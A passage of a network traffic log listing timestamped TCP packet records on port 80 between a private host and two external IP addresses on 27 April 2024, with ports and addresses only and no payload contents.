Apr 27, 2024 01:31:18.623286009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623326063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623331070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.623363972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623403072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623414040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.623441935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623481035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623492956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.623521090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623558998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623591900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.623596907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623637915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623646021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.623676062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623716116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623720884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.623756886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623796940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623835087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623843908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.623872995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623878956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.623910904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623949051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623979092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.623986959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624027014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624043941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.624066114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624115944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.624130964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624172926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624212027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624222040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.624253035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624290943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624301910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.624330044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624368906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624387980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.624408007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624445915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624474049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.624484062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624525070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624550104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.624562025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624603033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624609947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.624640942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624680042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624687910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.624718904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624758005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624778986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.624797106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624835014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624840021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.624875069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624913931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624924898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.624953032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.624990940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625019073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.625030041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625067949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625080109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.625108004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625147104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625185966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625195026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.625226021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625226974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.625264883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625303030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625307083 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.625341892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625380039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625416994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625425100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.625458002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625468969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.625497103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625536919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625544071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.625576019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625616074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625627995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.625653028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625691891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625730991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625744104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.625771046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625778913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.625808954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625847101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625854969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.625888109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625925064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.625936031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.625963926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626007080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626024008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.626045942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626084089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626100063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.626121998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626159906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626167059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.626202106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626239061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626251936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.626279116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626317978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626331091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.626358032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626396894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626409054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.626435995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626472950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626482964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.626512051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626547098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.626552105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626590014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626629114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626667023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626674891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.626705885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626710892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.626745939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.626826048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.688313007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.688383102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.688483953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.746747017 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.746807098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.746849060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.746903896 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.746949911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.746994972 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.747034073 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.747067928 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.747092962 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.747214079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.747251987 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.747278929 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.747306108 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.747335911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.747395992 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.747494936 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.747534990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.747558117 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.747586012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.747615099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.747675896 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.748034954 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.748084068 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.748116016 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.748142004 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.823018074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823077917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823133945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823159933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823179960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823200941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823223114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823241949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823261976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823282003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823302031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823338032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823393106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823417902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.823432922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823446035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.823472977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823491096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.823513985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823538065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.823549032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.823554039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823595047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823631048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.823635101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823652029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.823676109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823736906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823744059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.823765993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.823780060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823790073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.823821068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823839903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.823863029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823873997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.823901892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823915005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.823941946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823956966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.823982000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.823998928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.824022055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.824032068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.824064970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.824075937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.824119091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.824213982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.824254990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.824263096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.824295044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.824312925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.824336052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.824342012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.824385881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.824414015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.824453115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.824465036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.824496031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.824500084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.824536085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.824543953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.824589014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.824664116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.824703932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.824717045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.824753046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.824843884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.824884892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.824898958 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.824923038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.824935913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.824963093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.824979067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825002909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825018883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825042009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825057983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825082064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825098038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825124025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825131893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825162888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825175047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825202942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825215101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825242996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825251102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825283051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825297117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825321913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825333118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825361013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825371027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825402975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825409889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825442076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825454950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825480938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825491905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825522900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825534105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825562954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825576067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825606108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825615883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825644970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825653076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825685024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825696945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825726032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825737953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825764894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825776100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825805902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825817108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825848103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825855017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825887918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825900078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825926065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825937986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.825967073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.825974941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826004982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826018095 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826044083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826067924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826081991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826093912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826121092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826131105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826160908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826173067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826200008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826216936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826241016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826256990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826278925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826294899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826318979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826330900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826359987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826370955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826400042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826411009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826440096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826452017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826478958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826484919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826520920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826534986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826560974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826574087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826602936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826611996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826642036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826653004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826682091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826694012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826721907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826734066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826761007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826776028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826801062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826812029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826839924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826853037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826879978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826890945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826919079 CEST	80	49734	176.97.76.106	192.168.2.4
